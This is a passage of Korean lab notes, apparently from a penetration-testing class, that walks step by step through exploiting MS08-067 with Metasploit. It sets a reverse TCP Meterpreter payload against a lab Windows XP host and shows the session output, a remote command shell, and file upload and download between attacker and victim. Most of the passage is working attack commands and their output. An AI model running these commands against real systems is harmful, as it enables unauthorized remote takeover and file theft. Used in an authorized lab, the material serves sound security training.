  76  Windows 2003 SP2 Dutch (NX)
  77  Windows 2003 SP2 Hungarian (NX)
  78  Windows 2003 SP2 Italian (NX)
  79  Windows 2003 SP2 Russian (NX)
  80  Windows 2003 SP2 Swedish (NX)
  81  Windows 2003 SP2 Turkish (NX)

Check supported:
  Yes

Basic options:    <-- 기본 옵션은 다양한 옵션들이 존재한다.
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:     <-- 페이로드 정보는 공격 코드에 사용할 수 있는 페이로드 정보를 담고 있다.
  Space: 408
  Avoid: 8 characters

Description:     <-- 설명은 해당 모듈이 공격하는 특정 취약점에 관한 더 많은 정보를 포함하고 있다.
  This module exploits a parsing flaw in the path canonicalization 
  code of NetAPI32.dll through the Server Service. This module is 
  capable of bypassing NX on some operating systems and service packs. 
  The correct target must be used to prevent the Server Service (along 
  with a dozen others in the same process) from crashing. Windows XP 
  targets seem to handle multiple successful exploitation events, but 
  2003 targets will often crash or hang on subsequent attempts. This 
  is just the first version of this module, full support for NX bypass 
  on 2003, along with other platforms, is still in development.

References:  <-- 참고는 온라인 취약점 데이터베이스 항목에 관한 링크다.
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250
  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos


View the full module info with the info -d command.

>>> 공격 순서 <<<

1. 공격 module 검색: search
2. 공격 module 선택: use
3. 공격 payload 선택: set payload
4. module 옵션값 설정: show -> set
5. 공격 payload 설정: set ...
6. 공격: exploit

search ms08_067
use exploit/windows/smb/ms08_067_netapi
show options
set  payload windows/meterpreter/reverse_tcp
set RHOSTS 200.200.200.4
show options

msf6 exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 200.200.200.3:4444 
[*] 200.200.200.4:445 - Automatically detecting the target...
[*] 200.200.200.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Korean
[*] 200.200.200.4:445 - Selected Target: Windows XP SP3 Korean (NX)
[*] 200.200.200.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 200.200.200.4
[*] Meterpreter session 1 opened (200.200.200.3:4444 -> 200.200.200.4:1078) at 2023-03-09 01:49:14 -0500

meterpreter > 

Target의 Windows XP가 방화벽이 설정되지 않았기 때문에 exploit 명령어 이후에 공격 패킷을 전송하고 
공격에 성공되면 아래처럼 Meterpreter session 1 opened 메세지가 출력되고 프롬프트가 생기게 된다.

공격이 연결된 미터프리터 쉘 구조

                +-- meterpreter shell
                |
  Attacker      |        Victim1
+----------+    v      +----------+
|          |  +===+    |          |
|          |  |   |    |          |
|   4444 ---->| M |<------- 1078  |
|          |  |   |    |          |
|          |  +===+    |          |
+----------+           +----------+
200.200.200.3          200.200.200.4
                       filewall.cpl 비활성화


meterpreter > help

meterpreter > shell
Process 1056 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

C:\WINDOWS\system32>ipconfig       
ipconfig

Windows IP Configuration


Ethernet adapter ·τ`¿µ¿ª ¿¬°

        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 200.200.200.4
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 200.200.200.2

netstat or tcpview 로 확인하면 연결된 상태를 확인할 수 있다. 
C:\>netstat -na | findstr 4444
  TCP    200.200.200.4:1078     200.200.200.3:4444     ESTABLISHED

C:\WINDOWS\system32>exit

실습> 파일 업로드

ls  : Remote ls
lls : Local ls

meterpreter > help upload
Usage: upload [options] src1 src2 src3 ... destination

Uploads local files and directories to the remote machine.

OPTIONS:

    -h  Help banner
    -r  Upload recursively

meterpreter > upload /etc/passwd /etc/group c:/
meterpreter > upload /bin/ls c:/
meterpreter > ls c:/

meterpreter > help download 
Usage: download [options] src1 src2 src3 ... destination

Downloads remote files and directories to the local machine.

OPTIONS:

    -a   Enable adaptive download buffer size
    -b   Set the initial block size for the download
    -c   Resume getting a partially-downloaded file
    -h   Help banner
    -l   Set the limit of retries (0 unlimits)
    -r   Download recursively
    -t   Timestamp downloaded files

Victim, Target에 있는 파일을 다운로드 받아서 파일의 크기를 비교한다.
meterpreter > download C:/windows/system32/notepad.exe
[*] Downloading: C:/windows/system32/notepad.exe -> /root/notepad.exe
[*] Downloaded 66.00 KiB of 66.00 KiB (100.0%): C:/windows/system32/notepad.exe -> /root/notepad.exe
[*] download   : C:/windows/system32/notepad.exe -> /root/notepad.exe
meterpreter > lls notepad.exe
100644/rw-r--r--  67584  fil  2008-04-14 08:00:00 -0400  notepad.exe

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 200.200.200.4 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(windows/smb/ms08_067_netapi) > exit